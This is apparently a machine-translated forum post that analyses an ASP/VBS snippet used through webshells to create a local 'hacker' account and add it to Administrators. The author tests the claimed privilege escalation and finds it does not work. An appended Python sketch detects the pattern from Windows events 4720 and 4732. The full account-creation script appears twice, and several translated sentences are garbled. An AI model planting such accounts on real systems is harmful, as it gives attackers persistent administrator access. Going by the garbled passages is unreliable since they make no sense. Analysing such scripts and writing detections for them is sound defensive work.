From lake2
This stuff is gaining popularity. If you do not know it, read the article "Add a Super User .asp Code".
The author also said, "the code is correct, but it rarely succeeds. It depends on luck." I tried it on a webshell and it failed. After removing the error tolerance statement, the error is "insufficient permissions". It's okay today. Let's analyze it. Maybe ...... Hey.
The key to his code is this:
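' ASP form: WScript.Network supplies the local computer name
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
' Create the account, set its password and commit it
Set od = ob.Create("user", username)
od.SetPassword passwd
od.SetInfo
' Add the new account to the local Administrators group
oe.Add oz & "/" & username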
It does nothing more than create a WScript.Network object in ASP and use this object to add users and promote them to administrators. According to their statement, a local privilege escalation vulnerability of the WScript.Network object is exploited (they said this has not been announced by MS). Well, I will make the code into a VBS script file and run it from the command line.
Test.vbe (VBE is better than VBS; VBS is subject to many restrictions)
--------------------------------------------
' Command-line form of the same code: CreateObject instead of Server.CreateObject
Set lp = CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
Set od = ob.Create("user", "hacker")
' The password is a string literal, so it must be quoted
od.SetPassword "Test"
od.SetInfo
oe.Add oz & "/" & "hacker"
-------------------------------------------
With admin permission, it generates a hacker user. If it is executed with user permission, the following error occurs: access is denied. It seems that the permission is not enough; that is, the so-called "WScript.Network object local privilege escalation vulnerability" that MS has not published does not exist, at least on my XP SP1. You can also save the above code as a VBE file and try it with user permission. Next, try to see if this bug exists in other systems. However, this ASP will rarely succeed.
The last time I went back to the login coast, I told me that if IIS had enabled ASP authentication, I could. I disabled anonymous access to IIS locally, and this script can work. However, your browser has administrator permissions. It is clear that anonymous access is disabled, so why didn't a dialog box pop up asking you to enter your user password? Haha, locally you are naturally using integrated Windows Basic authentication. At this time, I am the Administrator, so of course the ASP also inherits the admin permission. I don't know if the author made an error here?
I think this legend is wrong. Thank you for your advice. Let's talk about it first. You are not allowed to face it. ^_^
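A defender's view of the sequence analyzed above, as an added example that is not part of the original post: the script creates a local account and then adds it to Administrators, which the Windows Security log records as event 4720 followed by event 4732 (IDs on Vista and later). The sketch correlates the two over constructed sample records and reports who performed each step, which is the identity question the post raises; the record layout (dicts with `time`, `id` and the events' field names) and the function name `find_new_admins` are assumptions.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"      # well-known SID of BUILTIN\Administrators
USER_CREATED, MEMBER_ADDED = 4720, 4732  # Security log event IDs (Vista and later)

# Constructed sample records, shaped like Security events exported to dicts.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4720, "SubjectUserName": "alice",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"time": "2024-05-01T10:00:02", "id": 4720, "SubjectUserName": "Administrator",
     "TargetUserName": "hacker", "TargetSid": "S-1-5-21-1-2-3-1106"},
    {"time": "2024-05-01T10:00:03", "id": 4732, "SubjectUserName": "Administrator",
     "MemberSid": "S-1-5-21-1-2-3-1106", "TargetSid": ADMINISTRATORS_SID},
    # Added to a different local group (Remote Desktop Users): not a hit.
    {"time": "2024-05-01T18:30:00", "id": 4732, "SubjectUserName": "alice",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetSid": "S-1-5-32-555"},
]

def find_new_admins(events, window=timedelta(minutes=5)):
    """Return accounts created and then added to Administrators within `window`."""
    created = {}  # account SID -> (creation time, account name, creator)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == USER_CREATED:
            created[ev["TargetSid"]] = (when, ev["TargetUserName"],
                                        ev["SubjectUserName"])
        elif ev["id"] == MEMBER_ADDED and ev["TargetSid"] == ADMINISTRATORS_SID:
            seen = created.get(ev["MemberSid"])
            if seen and when - seen[0] <= window:
                hits.append({"account": seen[1], "created_by": seen[2],
                             "added_by": ev["SubjectUserName"],
                             "seconds_apart": (when - seen[0]).total_seconds()})
    return hits

if __name__ == "__main__":
    for hit in find_new_admins(SAMPLE_EVENTS):
        print(hit)
```

These events are written only when account-management auditing is enabled on the host.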